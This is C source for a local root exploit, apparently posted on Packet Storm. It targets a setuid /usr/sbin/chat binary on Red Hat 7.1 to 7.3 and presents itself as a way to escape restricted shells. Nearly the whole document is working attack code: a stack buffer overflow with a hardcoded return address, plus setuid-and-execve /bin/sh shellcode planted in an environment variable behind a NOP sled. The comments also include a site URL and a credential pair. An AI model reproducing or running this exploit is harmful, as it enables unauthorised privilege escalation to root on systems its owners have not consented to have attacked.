Chat Local root exploit for redhat. Requires chat to be +s for root exploitation. Useful for breaking out from restricted Shells. Tested on Redhat 7.1, 7.2, and 7.3.
a38709858c17621a4940bea65d88f2f573fdcbf9e2cf26ccd0d9873946196a70/* Chat Local root exploit for redhat */
/* Requires chat to be +s for root exploitation */
/* A good way to break from restricted Shells... */
/* Tested on Redhat 7.1/2/3 */
/* c0w_d0g3@yahoo.co.uk */
/* uk2sec */
/* http://oakey.no-ip.com:82/uk2sec/ */
/* kiddie:password */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main()
{
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
unsigned long sp(void)
{ __asm__("movl %esp, %eax"); }
/* This returns the stack pointer and lets us put it into esp*/
char buffer[3000];
long esp = sp();
long retaddr = 0xbfffff8a; /* The return address */
int padding = 1052;
char shell[512];
printf("c0w_d0g3 uk2sec");
printf("\nThis is a local exploit for /usr/sbin/chat\n");
printf("\nEnsure chat is +s or you'll not get far\n");
printf("\n The stack pointer is at : %x\n", esp);
printf(" The return address is at : %x\n", retaddr);
/* Building the buffer */
bzero(&buffer, sizeof(buffer));
memset(buffer,'A',padding); //size of buffer
*(unsigned long *)(buffer+strlen(buffer))=retaddr; //return address
printf("\nthe ret is : 0x%x", retaddr);
memset(shell,0x90,100);
memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode));
memcpy(shell,"SHELLCODE=",10);
putenv(shell);
execl("/usr/sbin/chat", "chat", buffer, NULL);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed